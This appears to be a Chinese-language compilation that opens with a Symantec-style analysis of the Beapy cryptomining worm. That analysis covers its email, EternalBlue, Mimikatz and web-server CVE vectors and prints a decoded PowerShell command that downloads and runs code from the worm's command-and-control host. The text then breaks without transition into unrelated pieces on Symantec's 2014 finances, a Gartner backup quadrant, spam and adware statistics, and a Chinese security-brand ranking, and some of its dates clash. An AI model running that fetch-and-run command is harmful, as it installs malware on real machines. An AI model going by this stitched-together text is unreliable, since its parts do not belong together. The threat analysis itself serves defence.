Beapy (W32.Beapy) 是一种基于文件的货币挖矿程序，其最初感染源为电子邮件。虽然自 2018 年初以来，加密劫持的数量已经有所减少，但Beapy的出现说明，加密劫持仍然是某些网络犯罪分子的首选手段，而企业成为了他们的首要攻击目标。

以攻击目标来看，Beapy的攻击对象几乎全部是企业（见图 1）。这一攻击趋势与2018 年 的Bluwimps 蠕虫 (MSH.Bluwimps) 十分相似，这表示加密劫持网络犯罪分子对企业的关注度更高，这一发现在赛门铁克 2019 年《互联网安全威胁报告》 中也有提到。虽然没有证据表明这些网络攻击活动的针对性，但Beapy蠕虫病毒的特性表明，它很可能被设计为主要依靠企业网络来进行传播。

这与2018 年勒索软件的趋势十分类似——尽管从总体来看，2018年勒索软件感染率下降了 20％，但企业的感染率却依旧增加了 12％，由此可见，网络犯罪分子对企业的关注度还在持续增加。

Beapy恶意程序对亚洲企业的影响最为严重，其中超过 80％的受害者及受害企业来自中国，其余的20%则分布于韩国、日本和越南等其他国家和地区。

感染链

Beapy 活动的最初感染源是电子邮件。如果收件人打开了带有恶意Excel文档的附件，目标计算机就会主动下载DoublePulsar 后门 (Backdoor.Doublepulsar)。同 EternalBlue 一样，DoublePulsar 也会在 Shadow Brokers 转储中进行泄露，这一行为也曾被用于 2017 年 WannaCry 勒索软件破坏性攻击。DoublePulsar 会在受感染的计算机上开启后门程序并允许远程代码执行操作。EternalBlue 则利用 Windows SMB 协议中的漏洞允许文件在网络中横向传播。

DoublePulsar 安装成功后，会执行一个 PowerShell 命令，并在与Beapy命令和控制服务器通信后将货币挖矿程序下载到目标计算机。2019 年 2 月 15 日，赛门铁克安全中心第一次监测到了DoublePulsar 后门程序，随后 PowerShell 命令被启动，该命令被解码为以下内容：

IEX (New-Object Net.WebClient).downloadstring(‘http://v.beahh.com/v’+$env:USERDOMAIN)

这意味着设备正在与 Beapy 命令和控制服务器建立通信，计算机会继续执行其他的PowerShell 命令，同时下载货币挖矿程序。在 Beapy 传播到网络中其他计算机上时，会重复此过程。

一般而言，Beapy 会将未安装补丁的机器作为攻击对象，然后借助EternalBlue进行传播。但是，EternalBlue 并不是 Beapy的唯一传播工具，它还可以使用凭据盗窃工具 Hacktool.Mimikatz 从受感染的计算机上收集凭证。通过这些传播工具，Beapy甚至还可以传播到安装了补丁程序的机器上。与 Bluwimps 蠕虫类似，Beapy 甚至还可以使用硬编码用户名和密码列表尝试跨网络传播。早在 2017 年和 2018 年，Bluwimps就曾使用货币挖矿程序感染了数千台企业机器。

Web 服务器

赛门铁克安全中心还在面向公众的 Web 服务器上监测到了 Beapy 的早期版本，当时该程序试图传播到与服务器相连的计算机上，形式之一是它会自动生成一个攻击目标的IP地址列表。

在Web 服务器上看到的是Beapy程序的早期版本，早期版本与后来的版本都是由 C 语言编写，而非 Python ，并且攻击手段类似，其下载的恶意软件中也含有用于凭据收集的 Mimikatz 模块，以及 EternalBlue的漏洞利用功能。

在Web 服务器攻击中，Beapy 曾试图利用 Apache Struts 漏洞 (CVE-2017-5638) ——这一漏洞在 2017 年进行了修补，但如果它被成功攻破并利用，便会允许远程代码执行操作。Beapy 还尝试利用了 Apache Tomcat (CVE-2017-12615) 和 Oracle WebLogic Server (CVE-2017-10271) 中的已知漏洞。在赛门铁克观察到的Web 服务器攻击中，这种漏洞利用尝试行为开始于 2 月初，首次检测到与Beapy命令和控制服务器的通信是在 3 月 13 日，针对此 Web 服务器的 Beapy 活动则一直持续到 4 月初。

总体来说， Beapy 的活动从3月初开始便一直在增加。

Beapy 活动表明了什么？

2018 年加密劫持的攻击活动有所减少（加密劫持量下降 52％ ），但网络犯罪分子依旧十分热衷于这种入侵方式。相比2018 年 2 月 的峰值 800 万次，2019 年 3 月加密劫持活动总数低于 300 万，尽管在数据上有所在下降，但是加密劫持活动依然活跃。

Beapy 是一种基于文件传播的货币挖矿程序，但有趣的是，大部分加密劫持攻击行为都是通过基于浏览器的货币挖矿程序而进行。由于这种货币挖矿程序的进入门槛较低，且可以通过这一程序入侵已经安装补丁的计算机，从而受到黑客的欢迎。2017 年 9 月，Coinhive 货币挖矿服务推出后曾助长加密劫持活动，但这一服务在今年3 月初已经停止运营，基于浏览器的加密劫持也随之大幅减少。Coinhive 货币挖矿服务使得任何人都可以轻松地基于浏览器实施挖矿行为，因此关闭此项服务可能会对基于浏览器的加密劫持产生巨大影响。

另外，相比较基于浏览器的货币挖矿程序，基于文件的挖矿程序优势更加明显，它可以更快地挖掘加密货币。门罗币是加密劫持攻击期间最常被挖掘的加密货币，但是门罗币在2018 年贬值了90％，由此可见网络犯罪分子现在更偏爱可以快速挖掘加密货币的挖矿程序以帮助他们牟取更多的利益。

图 5.基于浏览器和基于文件的货币挖矿程序盈利能力比较

加密劫持对企业的影响

相比勒索软件带来的破坏性威胁，企业或许认为他们无需担心加密劫持活动。但实际上加密劫持也会对公司运营产生重大的影响。

加密劫持对企业的潜在影响包括：

• 设备性能下降，可能会降低员工士气并造成生产力下降；
• 电池过热；
• 设备性能退化或无法使用，从而导致 IT 成本增加；
• 耗电量增加，造成成本增加，特别是基于 CPU 使用量计费的云企业。

企业需要确保其网络免受各种安全威胁的侵害。

2014年 5月9日赛门铁克今天发布了截至3月28日的2014财年第四财季和全财年的财报。财报显示，赛门铁克第四财季总净营收达到16.3亿美元，同比下滑7%；净利润为2.17亿美元，同比增长14%。

赛门铁克临时总裁兼首席执行官迈克尔·布朗（Michael Brown）称：“由于销售团队的表现增强，以及削减成本，我们第四财季的结果也彰显了业务的稳健潜力。在新领导团队任职的头40天内，我们采取了重要措施来加速我们的过渡进程。我们有着大量的机遇来提升我们的增长速度、实现盈利能力的最大化，并创造价值。我相信，我们拥有正确的团队和计划来实现这些目标。”

财报显示，赛门铁克第四财季不按照美国通用会计准则计量的每股摊薄利润达到0.47美元，超过了业界分析师预计的0.42美元；第四财季营收为16.3亿美元，符合业界分析师预计的16.4亿美元。

2014财年第四财季业绩概要：

按照美国通用会计准则，赛门铁克第四财季总净营收为16.3亿美元，比去年同期的17.5亿美元下滑了7%；其中内容、订阅服务和维修服务的营收为14.33亿美元，比去年同期的15.27亿美元下滑了6%；授权许可营收达到1.92亿美元，比去年同期的2.21亿美元下滑了13%。

赛门铁克第四财季毛利润达到13.43亿美元，比去年同期的14.40亿美元下滑了7%。

按照美国通用会计准则，赛门铁克第四财季运营利率为18.8%，比去年同期增长了425个百分点。

按照美国通用会计准则，赛门铁克第四财季净利润达到2.17亿美元，同比增长14%；每股摊薄利润为0.31美元，同比增长15%。

按照美国通用会计准则，赛门铁克第四财季递延营收达到39亿美元，同比下滑4%，在货币调整后则下滑6%。

按照美国通用会计准则，赛门铁克第四财季运营活动现金流达到4.49亿美元，同比下滑27%。

不按照美国通用会计准则，赛门铁克第四财季营收达到16.5亿美元，同比下滑6%。

不按照美国通用会计准则，赛门铁克第四财季净利润达到3.29亿美元，同比增长4%；每股摊薄利润达到0.47美元，同比增长7%。

2014财年全年业绩概要：

按照美国通用会计准则，赛门铁克全财年营收达到66.8亿美元，比前一财年下滑3%。

按照美国通用会计准则，赛门铁克全财年运营利率达到17.7%，比前一财年增加了170个百分点。

按照美国通用会计准则，赛门铁克全财年净利润达到8.98亿美元，比前一财年增长了19%；每股摊薄利润达到1.28美元，比前一财年增长了21%。

按照美国通用会计准则，赛门铁克全财年运营活动现金流为12.8亿美元，比前一财年下滑了20%。

不按照美国通用会计准则，赛门铁克全财年营收达到67亿美元，比前一财年下滑了3%。

不按照美国通用会计准则，赛门铁克全财年净利润达到13.5亿美元，比前一财年增长8%；每股摊薄利润达到1.92美元，比前一财年增长了9%。

截至2014年3月28日，赛门铁克持有的现金、现金等价物及短期投资额共计达到40.8亿美元。

2014全财年，赛门铁克共回购了2100万股股票，平均每股价格为23.87美元，总耗资5亿美元。

业绩展望：

赛门铁克预计2015全财年营收将介于66.3亿美元到67.7亿美元之间；预计全财年按照美国通用会计准则计量的运营利率将介于21.8%到22.3%之间；预计全财年每股摊薄利润将介于1.43美元到1.51美元之间；预计不按照美国通用会计准则计量的每股摊薄利润将介于1.84美元到1.92美元之间，好于分析师预计的1.83美元。

赛门铁克预计2015财年第一财季营收将介于16.5亿美元到16.9亿美元之间；预计第一财季按照美国通用会计准则计量运营利率将介于18.4%到18.8%之间；预计按照美国通用会计准则计量的每股摊薄利润将介于0.31美元到0.33美元之间；预计第一财季不按照美国通用会计准则计量的每股摊薄利润将介于0.41美元到0.43美元之间，稍弱于分析师预计的0.43美元。

或许很多人会认为存储巨头会在领导者象限，但是我们看到的是CommVault技压群雄排在了最前面，跟随其后的是EMC、IBM和赛门铁克。Gartner的Wizard说：“NetApp的数据保护策略为用户提供了很强大的快照功能，可以在不影响性能的同时生成快照并且很省空间，也不会给用户和应用程序带来影响。但是需要指出的是NetApp的快照并不是他们自己的技术，而是发展自CommVault Simpana的SnapProtect。另外除了CommVault，NetApp和其他的备份厂商如Asigra、IBM、赛门铁克以及Syncsort都有很深的合作关系，NetApp的快照和备份管理产品都得益于和这些厂商的合作。从以上谈的NetApp的发展现状来看，他并不能被排在领导者象限。”

　　值得注意的新进厂商Actifio。这家公司也被排在了“有远见”的象限里。其实力主要表现在三个方面。首先Actifio改变传统的备份/恢复理念，做到实时恢复和全球重复数据删除;其次客户需要高度的自动化、简单的GUI界面来完成备份/恢复操作，以及基于SLA的RPO和RTO，Actifio可以做到这点;最后Actifio还未用户减少了不必要的开支以及引进复杂产品的必要。

Dell是Gartner魔力象限的一位新成员，这应该主要归功于对软件厂商Quest的收购。Veeam则应该感谢它的虚拟服务器备份方案。EI Reg称“我们被告知Veeam是第一家将备份、复制和嵌入数据重删(embeds deduplication)集合进虚拟机备份解决方案的厂商。”

挑战者象限中就只有惠普一家。这是因为这家公司的传统备份业务做的比CA、Asigra, Dell, EVault, Acronis, Syncsort以及飞康都要好，但是实力并没能做到领导者的水平。所以他就只能一个人在挑战者象限了。

CommVault凭借Simpana数据管理软件仍然统领着备份/恢复市场。从Simpana的更新来看，CommVault已经不是单纯的在做数据保护了，而是要将Simpana 打造成更为强大的数据管理软件。

在这些垃圾信息中，其中55%的都是跟性交易相关的产品以及服务，23%则携带有恶意网站的链接。据悉，每291封邮件中就有1封邮件会带有恶意网站链接。

赛门特克的报告显示，他们每天要屏蔽掉将近247350个恶意软件攻击，同比2011年，增加了30%。在2012年期间，目标性网络攻击同比2011年上升了42%。据悉，每天，全球平均会发生116个目标性网络攻击，它们主要盗取其他公司机密数据。其中，小型公司被攻击的概率最高。赛门特克指出，在2012年，员工人数少于250名的小型公司有31%的员工都曾遇到过网络攻击。赛门铁克认为，之所以这些小型公司被攻击的概率比较高则是因为它们无法像大型公司那样具备部署强大安全网的能力。

另外，赛门铁克还特别指出，现在，越来越的攻击采用了一种被称为“水坑(watering hole)”的攻击方式。它跟我们熟悉的网路公司相反，因为它不会直接去攻击目标，而是埋伏在他们知道目标可能会去的地方中。

除此之外，在该份报告中，赛门铁克还指出了2012年的移动恶意软件攻击同比2011年增长了58%。其中，苹果的iOS被发现存在有387个漏洞，是Android的13倍之多。

近半移动应用携带弹窗式恶意广告

　　2012年1月15日消息，据国外媒体报道，赛门铁克去年监测了150万个移动终端应用，结果发现近一半的应用程序携带恶意广告。然而，监管的缺失让用户不得不自行承担风险。

您是否还记得电脑浏览器被大量的弹窗广告淹没的时候？很不幸，恶梦还要继续上演。不过，弹窗广告的主要战场已经转移到了智能手机和平板电脑。移动设备的广告软件又被称作“恶意广告程序”（编者注：madware一词由malware和ad组合而成），它们在2012年犹如洪水猛兽般袭来，而且今年没有消停的意思。

为什么广告会如此疯狂？因为应用程序开发者和广告网络争先恐后地从广大移动设备用户身上榨取利润，哪怕尝试各种带有入侵性质的移动广告。网络分析师表示，这种广告投放方式既没有现成的行业规则可参照，美国也没有相应的法律约束它们。

网络安全监控机构IID副总裁保罗·弗格森（Paul Ferguson）指出：“广告泛滥的问题越来越严重。应用程序开发人员和广告网络总是以谋利为目的，但限制恶意广告投放行为的措施不足。”

杀毒软件巨头赛门铁克一直在监测150万个安装在Android智能手机和平板电脑上的应用程序。分析结果表明，在过去的9个月中，恶意广告程序增长了210％，近一半的应用程序能转播恶意广告，有甚者居然能散发17种。

当你在网上下载一个免费应用的时候，麻烦可能会随之而来。恶意广告会突然出现在你的日程表和相册中。甚至，有一种广告程序可以在用户拨打电话的时候植入语音广告——你在接通电话前必须听完整个广告。

另一种广告程序就是不断在通知栏上插入广告提醒。赛门铁克移动安全顾问理查德·克劳克（Richard Clooke）说：“你几乎无法辨别广告提醒和真正的消息提醒，比如待办事项提醒，以及短信和电邮通知。

许多免费的应用程序要求用户透露地理位置和个人信息。应用程序开发者和广告网络通过分析这些信息去投放更加具有针对性的广告，以引诱用户一步一步走入陷阱。信息安全公司Rapid7的移动部经理吉里·斯林尼瓦兹（Giri Sreenivas）指出，用户还需要面对另一个风险，即这些囤积起来的个人信息可能会被垃圾邮件制作者获取。

现在，移动设备用户必须自行判断一个程序是不是恶意广告程序。专家提醒，应用程序在提出权限请求时，用户应仔细考虑清楚，并在网上搜索该程序是否已经被举报。同时，用户可以使用的恶意广告程序探测器，比如赛门铁克的诺顿广告侦测器（Norton Spot）。

2012年9月5日晚间消息，互联网安全公司赛门铁克最新报告显示，在过去的12个月中，网络攻击给全球带来了1110亿美元的损失。

报告称，在2011年7月至2012年7月间，包括恶意软件攻击和钓鱼攻击在内的网络攻击给全球带来了1110亿美元的损失，给美国带来了207亿美元的损失。

在美国，有7100万网民成为了受害者，平均每位网民的直接经济损失290美元。在全球范围内，平均每位网民的直接经济损失为197美元。

报告指出，该期间内全球有5.56亿成年网民亲身经历过网络攻击，该数量超出了欧盟的整体人口数量，占到了所有成年网民数量的46%。

报告还显示，越来越多的攻击者开始利用社交网络和移动技术发动攻击，21%的成年网民表示遭遇到这方面攻击。

一、 整体情况

2012年5月安全软件品牌活跃度进入前十的品牌分别是瑞星、金山网络、网秦、360杀毒、卡巴斯基、赛门铁克、江民、迈克菲、小红伞。10个品牌平均活跃度指数为56.365。瑞星、金山网络、网秦位列三甲，活跃度指数分别为86.520、83.500、71.324（如表1所示）。

活跃度前十的品牌中，国内品牌数6个，平均活跃度为62.915，国际品牌数4个，平均活跃度为46.540。

与其它软件领域相比，安全软件品牌整体活跃度最高。经中国软件研究中心对安全软件、工业软件、协同办公软件活跃度的统计分析，安全软件平均活跃度为56.365，而工业软件与协同办公平均活跃度仅为46.926与46.397。

二、 新闻传播分析

　　（一）整体情况

5月份15家安全软件品牌防毒杀毒相关新闻网络媒体传播量共2859篇次，其中网秦传播最多，达768篇次，占所有安全软件品牌总传播量的26.88%，其次为瑞星，传播742篇次，占总传播篇次的25.97%，金山网络第三，传播355篇次，占12.43%。（如表2图3所示）

5月份安全软件品牌网络媒体新闻传播数按篇数统计，所有品牌共传播新闻305篇，其中网秦相关新闻108篇，高居首位。卡巴斯基47篇居次席，金山网络46篇居第三位。（如表3所示）

（二）热点新闻分析

5月份安全软件方面新闻传播量最大的15篇热点新闻中（如表3所示），转载次数最多的最热点的新闻为“瑞星紧急发布红色预警超级火焰病毒已入侵”，被转载143次，新闻主体为瑞星，其次为“瑞星私有云技术+5S服务 诠释行业变革”，被转载142次，新闻主体为瑞星；排第三的是“网秦宣布计划收购国信灵通55%股份“，新闻主体为网秦。

同时，在15篇热点新闻中，瑞星被传播最多，有5篇，占1/3，其次为网秦，有3篇（如表4所示）。在15篇热点新闻中，14篇属于正面报道，1篇属于负面报道，负面报道为“江民CEO林文新加盟1个月即离职 业务面临调整“。

三、 用户关注度

5月份，安全软件品牌用户关注度指数平均值为6122.5，其中，金山网络以30223关注度高居榜首，360排第二，为15206，瑞星以4640的用户关注度位列第三（如图4所示）。

四、 媒体关注度

5月份，安全软件品牌的平均媒体关注度指数为28.25。其中，网秦最受媒体关注，关注度指数为61，赛门铁克与瑞星分别以56和44的关注度分列前二三位（如图5所示）。

五、 值得关注的问题

1、 与其它软件行业相比，安全软件品牌整体活跃度较高，说明当前安全软件领域竞争激烈，特别是移动安全领域的竞争尤为激烈，而网秦作为移动安全的先行者，已抢占先机，品牌活跃度更是进入安全软件前三强。

2、 相比于国际品牌，国内安全软件品牌整体活跃度更高，说明国内品牌当前更重视市场推广与品牌宣传，也获得了更多用户的关注。

3、 安全软件品牌新闻传播呈两极分化态势，传播量最多的三个品牌网秦、瑞星、金山网络的传播量占到所有品牌总传播量的65.28%，在安全软件领域，品牌和市场地位差距或将进一步拉大。

4、 中性的标题和行业性的新闻切入点更易吸引媒体传播，获得更好的传播效果。

虽然70.5%的比例仍然很高，但已经较数年前大幅下降，彼时的数据曾经超过90%。赛门铁克上月每天都会分析约80亿封电子邮件，并借此得出了上述数据。

在微软等企业与美国执法机构今年3月联合捣毁了Rustock僵尸网络后，垃圾邮件的数量大幅下滑。该僵尸网络每天发送的垃圾邮件高达300亿封。赛门铁克高级软件工程师安迪·沃森(Andy Watson)说：“自那以后，并没有新的僵尸网络填补空缺。”

各国执法机构都加大了对僵尸网络的处罚力度，今年被捣毁的僵尸网络还包括Coreflood和Kelihos，2010年则包括Waledac和Bredolab。

但沃森表示，垃圾信息传播者目前已经将重点放在社交媒体网站，并且可以从中获得更好的回报。他们可以借助Twitter和Facebook等服务散布恶意链接，并展开不法活动。